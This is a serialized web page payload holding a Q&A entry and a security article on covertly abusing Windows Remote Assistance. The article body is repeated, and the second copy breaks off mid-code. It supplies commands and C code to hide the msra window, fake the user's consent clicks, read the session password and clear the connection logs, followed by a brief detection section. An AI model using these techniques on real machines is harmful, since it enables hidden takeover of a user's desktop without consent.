[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_WZjp370KNnaZ4tmy8X-oXYyW8-eopbYbAi-9vriC14":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},1141,"How can an attacker programmatically obtain the remote assistance connection password from the invitation popup window?","The attacker can enumerate child windows of the 'Windows Remote Assistance' window using the `EnumChildWindows` API. In the enumeration callback, they send a `WM_GETTEXT` message to each child window; testing shows that the second child window contains the password string. By returning `0` after finding it, the enumeration stops early, and the password can be extracted for later use. This technique is similar to interface manipulation discussed in [Penetration Techniques - Exploitation of Clipboard in Windows](\u002Fnews\u002Fpenetration-techniques-exploitation-of-clipboard-in-windows).","\u003Cp>The attacker can enumerate child windows of the &#39;Windows Remote Assistance&#39; window using the `EnumChildWindows` API. In the enumeration callback, they send a `WM_GETTEXT` message to each child window; testing shows that the second child window contains the password string. By returning `0` after finding it, the enumeration stops early, and the password can be extracted for later use. This technique is similar to interface manipulation discussed in [Penetration Techniques - Exploitation of Clipboard in Windows](\u002Fnews\u002Fpenetration-techniques-exploitation-of-clipboard-in-windows).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-stealth-execution-of-windows-remote-assistance\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-programmatically-obtain-the-remote-assistance-connection-pas-1777480379982","child window enumeration, EnumChildWindows, WM_GETTEXT, password extraction, Windows Remote Assistance, API",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":20,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},277,"Penetration Techniques - Stealth Execution of Windows Remote Assistance","penetration-techniques-stealth-execution-of-windows-remote-assistance","Learn stealth techniques for Windows Remote Assistance exploitation, including hidden interfaces, simulated clicks, and detection methods for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For Windows systems, remote desktop services are frequently used to manage systems remotely through the interface.\u003C\u002Fp>\u003Cp>However, there is a drawback: when using remote desktop services for remote login (using another user or kicking off the current user), it is impossible to obtain the current user's system status.\u003C\u002Fp>\u003Cp>If you want to view (or even operate) the current user's desktop, what are some good methods?\u003C\u002Fp>\u003Cp>Although we can write programs to implement interface operations (capturing desktop information, compressing and transmitting it, sending mouse and keyboard messages, etc.), wouldn't it be better if we could use the default functionality of the Windows system?\u003C\u002Fp>\u003Cp>The answer is Windows Remote Assistance.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic operations of remote assistance\u003C\u002Fli>\u003Cli>Command-line operations\u003C\u002Fli>\u003Cli>Writing a C++ program to hide the interface, send keyboard messages, and simulate user confirmation clicks\u003C\u002Fli>\u003Cli>Complete exploitation process\u003C\u002Fli>\u003Cli>Detection Method\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Operations of Remote Assistance\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable Remote Assistance Feature\u003C\u002Fh3>\u003Cp>System Properties -&gt; Remote\u003C\u002Fp>\u003Cp>Select 'Allow Remote Assistance connections to this computer'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016717108_0_37799f52c8.jpeg\">\u003C\u002Fp>\u003Ch3>2. Add Firewall Rule to Allow Communication Port for Remote Assistance\u003C\u002Fh3>\u003Cp>Windows Firewall -&gt; Allowed Programs\u003C\u002Fp>\u003Cp>Select 'Remote Assistance'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016722659_1_9e8b36b8b8.jpeg\">\u003C\u002Fp>\u003Ch3>3. Launch the Interface Program\u003C\u002Fh3>\u003Cp>Run -&gt; msra.exe\u003C\u002Fp>\u003Ch3>4. Configure this machine as the server and request assistance from others\u003C\u002Fh3>\u003Cp>Select 'Invite someone you trust to help you'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016728974_2_8807924bbc.jpeg\">\u003C\u002Fp>\u003Cp>Select 'Save this invitation as a file'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016733335_3_91bbd1b45a.jpeg\">\u003C\u002Fp>\u003Cp>Save as file 'Invitation.msrcincident'\u003C\u002Fp>\u003Cp>An interface automatically pops up, generating a random password. Record this password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016736782_4_1e5e61fa6c.jpeg\">\u003C\u002Fp>\u003Ch3>5. Controller initiates remote connection\u003C\u002Fh3>\u003Cp>Run the file 'Invitation.msrcincident' on the controller, enter the password generated in the previous step, and initiate the remote connection\u003C\u002Fp>\u003Ch3>6. Server confirms connection request\u003C\u002Fh3>\u003Cp>A dialog box pops up on the server, requiring user confirmation to allow remote assistance, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016739705_5_0e68ba6314.jpeg\">\u003C\u002Fp>\u003Cp>Select Yes to successfully establish remote assistance\u003C\u002Fp>\u003Ch2>0x03 Command Line Operations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable System Remote Assistance\u003C\u002Fh3>\u003Cp>Modify the registry key fAllowToGetHelp under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance, where 1 represents allow and 0 represents deny\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance\" \u002Fv fAllowToGetHelp \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Configure firewall rules to allow communication ports for remote assistance\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall firewall set rule group=\"Remote Assistance\" new enable=Yes\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Create a remote assistance file and wait for user connection in the background\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msra \u002Fsaveasfile c:\\test\\1.msrcIncident 123456789012\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save file path as c:\\test\\1.msrcIncident, connection password is 123456789012\u003C\u002Fp>\u003Ch2>0x04 Write a C program to hide the interface, send keyboard messages, and simulate user confirmation clicks\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Hide the msra.exe interface\u003C\u002Fh3>\u003Cp>Obtain the window handle and set the window property to hidden\u003C\u002Fp>\u003Cp>Note that the window title of msra.exe varies across different language systems, for example, the window title is 'Windows 远程协助' in Chinese systems and 'Windows Remote Assistance' in English systems.\u003C\u002Fp>\u003Cp>First, determine the current system language, then search for the corresponding window title.\u003C\u002Fp>\u003Cp>To completely hide the interface, incorporate a loop check to immediately hide the msra.exe window as soon as it is found.\u003C\u002Fp>\u003Cp>Reference code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\",lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows 远程协助\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tfor(int i=0;i&lt;1;i)\u003Cbr>\t{\u003Cbr>\t\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\t\tShowWindow(hwnd, SW_HIDE);\u003Cbr>\t\tSleep(100);\u003Cbr>\t}\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate msra-hide.exe\u003C\u002Fp>\u003Ch3>2. Simulate keyboard input messages: left arrow (&lt;-) and enter confirmation key\u003C\u002Fh3>\u003Cp>Normally, after the control end successfully enters the password, the server end will pop up a dialog box asking the user whether to allow remote assistance.\u003C\u002Fp>\u003Cp>Here, the program simulates user input, selects Yes, and the corresponding keyboard operations are the left arrow (&lt;-) and the Enter key for confirmation.\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\",lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\tSetActiveWindow(hwnd);\u003Cbr>\tSetForegroundWindow(hwnd);\u003Cbr>\tSetFocus(hwnd);\u003Cbr>\tkeybd_event(37,0,0,0);\u003Cbr>\tkeybd_event(37,0,KEYEVENTF_KEYUP,0);\u003Cbr>\tkeybd_event(13,0,0,0);\u003Cbr>\tkeybd_event(13,0,KEYEVENTF_KEYUP,0);\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate msra-allow.exe\u003C\u002Fp>\u003Ch3>3. Extension: Obtain the connection password for the remote assistance window\u003C\u002Fh3>\u003Cp>Obtain the connection password by enumerating child windows\u003C\u002Fp>\u003Cp>Use the API FindWindow to obtain the window handle\u003C\u002Fp>\u003Cp>Use the API EnumChildWindows to traverse all child windows of the window and obtain the password content\u003C\u002Fp>\u003Cp>API EnumChildWindows automatically enumerates until the last child window is obtained or the function returns 0\u003C\u002Fp>\u003Cp>Actual testing found that the second child window stores the password, so after obtaining the password, the function returns 0 to end enumeration early\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int status = 0;\u003Cbr>BOOL CALLBACK EnumMainWindow(HWND hwnd, LPARAM lParam)\u003Cbr>{\u003Cbr>\tconst int BufferSize = 1024;\u003Cbr>\tchar BufferContent[BufferSize] = \"\";\u003Cbr>\tSendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);\u003Cbr>\tstatus++;\u003Cbr>\tif (status == 2)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[+]Find Password\\n\");\u003Cbr>\t\tprintf(\"%s\\n\", BufferContent);\u003Cbr>\t\treturn 0;\u003Cbr>\t}\u003Cbr>\treturn 1;\u003Cbr>}\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\", lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\tif(hwnd)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[+]Find Window\\n\");\u003Cbr>\t\tEnumChildWindows(hwnd, EnumMainWindow, 0);\u003Cbr>\t}\u003Cbr>\telse\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[!]No Window\\n\");\u003Cbr>\t}\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016743030_6_6efc8711f0.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Complete Exploitation Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable Remote Assistance\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance\" \u002Fv fAllowToGetHelp \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003Cbr>netsh advfirewall firewall set rule group=\"Remote Assistance\" new enable=Yes\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Run the interception program msra-hide.exe to hide the msra window\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>3. Generate Remote Assistance invitation file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msra \u002Fsaveasfile c:\\test\\1.msrcIncident 123456789012\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Controller initiates connection\u003C\u002Fh3>\u003Cp>Obtain file 1.msrcIncident and execute, enter connection password\u003C\u002Fp>\u003Ch3>5. Run simulated keyboard input program msra-allow.exe to allow remote assistance\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Ch3>6. Controller gains remote assistance desktop access\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016745775_7_3edb7c80da.jpeg\">\u003C\u002Fp>\u003Ch3>7. Controller requests mouse operation permission from server\u003C\u002Fh3>\u003Cp>Select request control in the control interface\u003C\u002Fp>\u003Ch3>8. Run simulated keyboard input program msra-allow.exe again to allow mouse operation\u003C\u002Fh3>\u003Cp>Administrator privileges required\u003C\u002Fp>\u003Cp>Controller successfully gains control of server mouse\u003C\u002Fp>\u003Cp>At this point, successfully obtained desktop operation permissions on the target system\u003C\u002Fp>\u003Ch3>9. Clear connection records\u003C\u002Fh3>\u003Cp>Remote assistance log storage location: %SystemDrive%\\Users\\user_name\\Documents\\Remote Assistance Logs\u003C\u002Fp>\u003Cp>Naming convention: YYYYMMDDHHMMSS.xml (24-hour time format)\u003C\u002Fp>\u003Cp>Log files store connection timestamps\u003C\u002Fp>\u003Ch2>0x06 Detection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The methods described in this article assume administrator privileges have been obtained, indicating the system has already been compromised\u003C\u002Fp>\u003Cp>Combined with exploitation approaches, detection can be performed through the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance modified\u003C\u002Fli>\u003Cli>Firewall rules modified\u003C\u002Fli>\u003Cli>Process msra.exe launched\u003C\u002Fli>\u003Cli>New folder %SystemDrive%\\Users\\user_name\\Documents\\Remote Assistance Logs created\u003C\u002Fli>\u003Cli>Abnormal open ports\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces Windows Remote Assistance functionality, implements covert execution through programming, and provides detection methods based on exploitation approaches\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For Windows systems, remote desktop services are frequently used to manage systems remotely through the interface.\u003C\u002Fp>\u003Cp>However, there is a drawback: when using remote desktop services for remote login (using another user or kicking off the current user), it is impossible to obtain the current user's system status.\u003C\u002Fp>\u003Cp>If you want to view (or even operate) the current user's desktop, what are some good methods?\u003C\u002Fp>\u003Cp>Although we can write programs to implement interface operations (capturing desktop information, compressing and transmitting it, sending mouse and keyboard messages, etc.), wouldn't it be better if we could use the default functionality of the Windows system?\u003C\u002Fp>\u003Cp>The answer is Windows Remote Assistance.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic operations of remote assistance\u003C\u002Fli>\u003Cli>Command-line operations\u003C\u002Fli>\u003Cli>Writing a C++ program to hide the interface, send keyboard messages, and simulate user confirmation clicks\u003C\u002Fli>\u003Cli>Complete exploitation process\u003C\u002Fli>\u003Cli>Detection Method\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Operations of Remote Assistance\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable Remote Assistance Feature\u003C\u002Fh3>\u003Cp>System Properties -&gt; Remote\u003C\u002Fp>\u003Cp>Select 'Allow Remote Assistance connections to this computer'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016717108_0_37799f52c8-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Add Firewall Rule to Allow Communication Port for Remote Assistance\u003C\u002Fh3>\u003Cp>Windows Firewall -&gt; Allowed Programs\u003C\u002Fp>\u003Cp>Select 'Remote Assistance'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016722659_1_9e8b36b8b8-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Launch the Interface Program\u003C\u002Fh3>\u003Cp>Run -&gt; msra.exe\u003C\u002Fp>\u003Ch3>4. Configure this machine as the server and request assistance from others\u003C\u002Fh3>\u003Cp>Select 'Invite someone you trust to help you'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016728974_2_8807924bbc-1.jpeg\">\u003C\u002Fp>\u003Cp>Select 'Save this invitation as a file'\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016733335_3_91bbd1b45a-1.jpeg\">\u003C\u002Fp>\u003Cp>Save as file 'Invitation.msrcincident'\u003C\u002Fp>\u003Cp>An interface automatically pops up, generating a random password. Record this password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016736782_4_1e5e61fa6c-1.jpeg\">\u003C\u002Fp>\u003Ch3>5. Controller initiates remote connection\u003C\u002Fh3>\u003Cp>Run the file 'Invitation.msrcincident' on the controller, enter the password generated in the previous step, and initiate the remote connection\u003C\u002Fp>\u003Ch3>6. Server confirms connection request\u003C\u002Fh3>\u003Cp>A dialog box pops up on the server, requiring user confirmation to allow remote assistance, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016739705_5_0e68ba6314-1.jpeg\">\u003C\u002Fp>\u003Cp>Select Yes to successfully establish remote assistance\u003C\u002Fp>\u003Ch2>0x03 Command Line Operations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Enable System Remote Assistance\u003C\u002Fh3>\u003Cp>Modify the registry key fAllowToGetHelp under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance, where 1 represents allow and 0 represents deny\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Remote Assistance\" \u002Fv fAllowToGetHelp \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Configure firewall rules to allow communication ports for remote assistance\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall firewall set rule group=\"Remote Assistance\" new enable=Yes\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Create a remote assistance file and wait for user connection in the background\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msra \u002Fsaveasfile c:\\test\\1.msrcIncident 123456789012\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save file path as c:\\test\\1.msrcIncident, connection password is 123456789012\u003C\u002Fp>\u003Ch2>0x04 Write a C program to hide the interface, send keyboard messages, and simulate user confirmation clicks\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Hide the msra.exe interface\u003C\u002Fh3>\u003Cp>Obtain the window handle and set the window property to hidden\u003C\u002Fp>\u003Cp>Note that the window title of msra.exe varies across different language systems, for example, the window title is 'Windows 远程协助' in Chinese systems and 'Windows Remote Assistance' in English systems.\u003C\u002Fp>\u003Cp>First, determine the current system language, then search for the corresponding window title.\u003C\u002Fp>\u003Cp>To completely hide the interface, incorporate a loop check to immediately hide the msra.exe window as soon as it is found.\u003C\u002Fp>\u003Cp>Reference code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\",lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows 远程协助\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tfor(int i=0;i&lt;1;i)\u003Cbr>\t{\u003Cbr>\t\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\t\tShowWindow(hwnd, SW_HIDE);\u003Cbr>\t\tSleep(100);\u003Cbr>\t}\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate msra-hide.exe\u003C\u002Fp>\u003Ch3>2. Simulate keyboard input messages: left arrow (&lt;-) and enter confirmation key\u003C\u002Fh3>\u003Cp>Normally, after the control end successfully enters the password, the server end will pop up a dialog box asking the user whether to allow remote assistance.\u003C\u002Fp>\u003Cp>Here, the program simulates user input, selects Yes, and the corresponding keyboard operations are the left arrow (&lt;-) and the Enter key for confirmation.\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\",lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\tSetActiveWindow(hwnd);\u003Cbr>\tSetForegroundWindow(hwnd);\u003Cbr>\tSetFocus(hwnd);\u003Cbr>\tkeybd_event(37,0,0,0);\u003Cbr>\tkeybd_event(37,0,KEYEVENTF_KEYUP,0);\u003Cbr>\tkeybd_event(13,0,0,0);\u003Cbr>\tkeybd_event(13,0,KEYEVENTF_KEYUP,0);\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate msra-allow.exe\u003C\u002Fp>\u003Ch3>3. Extension: Obtain the connection password for the remote assistance window\u003C\u002Fh3>\u003Cp>Obtain the connection password by enumerating child windows\u003C\u002Fp>\u003Cp>Use the API FindWindow to obtain the window handle\u003C\u002Fp>\u003Cp>Use the API EnumChildWindows to traverse all child windows of the window and obtain the password content\u003C\u002Fp>\u003Cp>API EnumChildWindows automatically enumerates until the last child window is obtained or the function returns 0\u003C\u002Fp>\u003Cp>Actual testing found that the second child window stores the password, so after obtaining the password, the function returns 0 to end enumeration early\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>int status = 0;\u003Cbr>BOOL CALLBACK EnumMainWindow(HWND hwnd, LPARAM lParam)\u003Cbr>{\u003Cbr>\tconst int BufferSize = 1024;\u003Cbr>\tchar BufferContent[BufferSize] = \"\";\u003Cbr>\tSendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);\u003Cbr>\tstatus++;\u003Cbr>\tif (status == 2)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[+]Find Password\\n\");\u003Cbr>\t\tprintf(\"%s\\n\", BufferContent);\u003Cbr>\t\treturn 0;\u003Cbr>\t}\u003Cbr>\treturn 1;\u003Cbr>}\u003Cbr>int main()\u003Cbr>{\u003Cbr>\tchar *Title = NULL;\u003Cbr>\tLANGID lid = GetSystemDefaultLangID();\u003Cbr>\tprintf(\"[*]LanguageID:0x%04x\\n\", lid);\u003Cbr>\tswitch (lid)\u003Cbr>\t{\u003Cbr>\t\tcase 0X0804:\u003Cbr>\t\t\tprintf(\"[*]Language:Chinese\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t\tcase 0x0409:\u003Cbr>\t\t\tprintf(\"[*]Language:English\\n\",lid);\u003Cbr>\t\t\tTitle = \"Windows Remote Assistance\";\u003Cbr>\t\t\tbreak;\u003Cbr>\t}\u003Cbr>\tHWND hwnd = FindWindow(NULL, Title);\u003Cbr>\tif(hwnd)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[+]Find Window\\n\");\u003Cbr>\t\tEnumChildWindows(hwnd, EnumMainWindow, 0);\u003Cbr>\t}\u003Cbr>\telse\u003Cbr>\t{\u003Cbr>\t\tprintf(\"[!]No 